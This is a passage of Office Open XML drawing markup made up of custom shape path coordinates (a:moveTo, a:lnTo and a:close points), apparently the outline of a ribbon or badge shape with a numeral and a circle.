                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634" y="77"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663" y="87"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663" y="87"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708" y="102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723" y="110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723" y="110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736" y="116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="747" y="124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="758" y="133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="766" y="142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="775" y="153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="783" y="166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="789" y="182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808" y="247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="823" y="292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="823" y="292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836" y="321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="850" y="348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="850" y="348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864" y="376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="871" y="390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="876" y="405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="876" y="405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880" y="419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="884" y="433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885" y="446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885" y="460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="883" y="474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878" y="488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="872" y="504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="863" y="520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="863" y="520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="839" y="563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828" y="583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="818" y="606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="818" y="606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808" y="634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="798" y="665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="798" y="665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788" y="694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="783" y="709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="775" y="723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="775" y="723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="766" y="740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="757" y="754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751" y="760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745" y="766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="738" y="771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="731" y="777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="805" y="1000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785" y="998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714" y="785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714" y="785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703" y="790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="772" y="997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593" y="982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566" y="1046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506" y="867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506" y="867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="495" y="871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559" y="1063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="550" y="1085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481" y="876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480" y="876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480" y="876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463" y="882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448" y="884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367" y="1217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356" y="1197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432" y="885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432" y="885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420" y="884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348" y="1180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316" y="1117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139" y="1149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223" y="799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220" y="798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220" y="798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212" y="796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212" y="796"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="885" h="1217">
                  <a:moveTo>
                    <a:pt x="497" y="656"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="497" y="208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411" y="208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411" y="208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411" y="216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404" y="235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397" y="243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397" y="243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390" y="252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381" y="258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371" y="261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360" y="262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360" y="327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398" y="327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398" y="656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="497" y="656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="497" y="656"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="885" h="1217">
                  <a:moveTo>
                    <a:pt x="486" y="124"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="486" y="124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511" y="131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536" y="139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560" y="150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="582" y="163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604" y="177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="623" y="194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643" y="211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659" y="229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674" y="250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688" y="272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700" y="294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710" y="318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718" y="343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724" y="369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="727" y="397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728" y="424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728" y="424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728" y="439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="727" y="455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725" y="470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="722" y="486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719" y="500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714" y="515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710" y="529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704" y="542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="698" y="556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691" y="569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684" y="582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676" y="594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668" y="606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659" y="618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649" y="629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639" y="640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628" y="650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618" y="659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606" y="668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594" y="677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="582" y="685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569" y="692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556" y="699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="542" y="705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528" y="710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513" y="716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="499" y="719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484" y="723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469" y="726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454" y="728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439" y="729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423" y="729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423" y="729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398" y="728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374" y="726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351" y="720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328" y="714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="306" y="706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284" y="696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264" y="684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244" y="672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209" y="642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193" y="626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179" y="607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166" y="589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154" y="568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143" y="547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143" y="551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164" y="597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178" y="619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193" y="640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209" y="659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228" y="677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247" y="693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268" y="708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291" y="721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314" y="733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338" y="742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363" y="749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389" y="755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416" y="759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443" y="760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443" y="760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459" y="759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475" y="758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491" y="756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507" y="754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522" y="749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537" y="745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553" y="741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="581" y="729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595" y="721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608" y="714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="621" y="705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634" y="696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646" y="686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="657" y="677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669" y="667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678" y="655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688" y="644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="698" y="632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707" y="619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715" y="606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723" y="593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="731" y="579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737" y="565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742" y="551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="747" y="536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751" y="520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="756" y="505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="758" y="489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760" y="474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="761" y="457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762" y="441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762" y="441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="761" y="426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760" y="411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759" y="397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="757" y="381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="753" y="367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749" y="353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="746" y="340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="740" y="326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="729" y="300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700" y="252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="682" y="230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663" y="210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642" y="191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619" y="175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595" y="160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569" y="148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543" y="137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515" y="129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486" y="124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486" y="124"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="885" h="1217">
                  <a:moveTo>
                    <a:pt x="216" y="696"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="217" y="696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217" y="697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217" y="697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221" y="701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221" y="701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221" y="701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221" y="701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223" y="702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223" y="702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224" y="703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224" y="703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224" y="703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224" y="703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225" y="703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231" y="708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231" y="709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243" y="718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243" y="718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247" y="721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249" y="722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249" y="722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253" y="726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256" y="727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256" y="727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256" y="727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261" y="730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264" y="731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264" y="731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267" y="733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275" y="739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278" y="740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281" y="742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285" y="744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289" y="746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293" y="747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296" y="749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296" y="749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300" y="752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304" y="753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304" y="753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308" y="755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310" y="756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310" y="756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316" y="758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319" y="759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319" y="759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323" y="761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326" y="761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326" y="761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332" y="764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334" y="765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334" y="765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340" y="767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342" y="767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342" y="767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348" y="769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351" y="769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351" y="769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356" y="771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358" y="771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358" y="771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365" y="773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366" y="773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366" y="773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372" y="775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374" y="775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374" y="775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382" y="777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383" y="777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383" y="777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390" y="778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391" y="779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391" y="779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398" y="780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399" y="780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399" y="780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407" y="780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457" y="782"/>
                  </a:lnTo>
